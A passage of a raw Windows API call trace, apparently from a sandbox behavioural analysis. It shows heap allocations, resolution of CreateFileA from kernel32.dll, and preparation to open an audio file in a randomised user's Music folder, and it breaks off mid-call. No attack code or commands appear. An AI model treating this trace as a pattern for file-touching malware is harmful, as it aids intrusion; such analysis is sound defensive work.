hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0181.201] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0181.201] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.201] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0181.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0181.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0181.201] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0181.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0181.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0181.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0181.202] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0181.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0181.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0181.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0181.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0181.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0181.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0181.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0181.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0181.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0181.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0181.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0181.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0181.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0181.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.206] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0181.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.209] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0181.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda08 [0181.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0181.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.210] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0181.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0181.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0181.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.210] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0181.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0181.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0181.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0181.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0181.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0181.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41) returned 0x9aa4f8 [0181.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 